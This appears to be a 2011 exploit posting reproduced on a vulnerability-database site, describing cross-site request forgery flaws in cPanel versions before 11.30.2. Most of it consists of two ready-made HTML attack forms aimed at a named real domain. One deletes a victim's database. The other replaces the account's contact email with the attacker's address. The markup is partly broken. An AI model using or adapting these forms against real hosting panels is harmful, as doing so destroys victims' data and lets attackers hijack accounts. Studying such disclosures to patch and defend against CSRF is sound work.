cPanel < 11.30.2 Multiple CSRF Vulnerabilities

2011-08-28 / 2011-08-29
Credit: Net.Edit0r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+] Info================================================================= [-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities [-] Author: Net.Edit0r [-] Home : Black-HG.Org ~ h4ckcity.org [-] Version: 11.30.2 [-] Software Link: http://cpanel.net [-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net [-] Date : 27/08/2011 [-] CVE : N/A [-] Vedio Demo : http://www.black-hg.org/Vedioz/cpanel.rar [-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili [+] Exploit=============================================================== [-] Introduction : cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which leads to Change email address script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well. Note: You can use this vulnerability to do intelligent [-] Remote Delete Database <html> <head> <body> <title>Coded By #BHG</title> <form method="post" action="https://www.downloadpars.ir:2083/cpsess1461226313/frontend/x3/sql/deldb.html" name="mainform" id="mainform"> <h4>Delete Database</h4> <div class="highlight"> <table cellpadding="3" cellspacing="0"> <tr> <td><label for="dbname">Victim Database:</label></td> <td><input type="text" name="db" id="dbname" style="width: 150px" /></td> </tr> <td> </td> <td><center><input type="submit" id="submit_dbname" value="Delete Database" class="input-button" /></center></td> <body onload="document.forms.g.submit();"> <td></td> </tr> </table> </div> </form> </div> </body> </html> [-] Remote Change Cpanel Mail <html> <head> <body> <title>Coded By #BHG</title> <form id="mainform" name="mainform" action="https://www.downloadpars.ir:2083/cpsess8033607818/frontend/x3/contact/saveemail.html?email="> <ul class="contact_form"> <li class="contact_label">Chenge New Email Address</li> <li class="contact_input brd"><input id="email" name="email" type="text" checked="checked" value="net.edit0r@gmail.com" size="40" /></li> <li class="contact_label">The second address to receive notifications</li> <li class="contact_input brd"><input id="second_email" name="second_email" type="text" checked="checked" value="" size="40" /></li> <li><strong>Contact Preferences</strong></li> <li class="contact_input"><input id="notify_disk_limit" name="notify_disk_limit" type="checkbox" checked="checked" value="1" size="40" />Send notifications to your contact email address when you are reaching your disk quota.</li> <li class="contact_input"><input id="notify_bandwidth_limit" name="notify_bandwidth_limit" type="checkbox" checked="checked" value="1" size="40" />Send notifications to your contact email address when you are reaching your bandwidth usage limit.</li> <li class="contact_input"><input id="notify_email_quota_limit" name="notify_email_quota_limit" type="checkbox" checked="checked" value="1" size="40" />Send notifications to your contact email address when one of your email accounts approaches or is over quota.</li> <input style="margin-top:10px" type="submit" id="submit-button" class="input-button" value="Save"></div></li> </ul> <br /> </form> </div> </body> </html>

References:

http://cpanel.net
http://www.black-hg.org/Vedioz/cpanel.rar


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top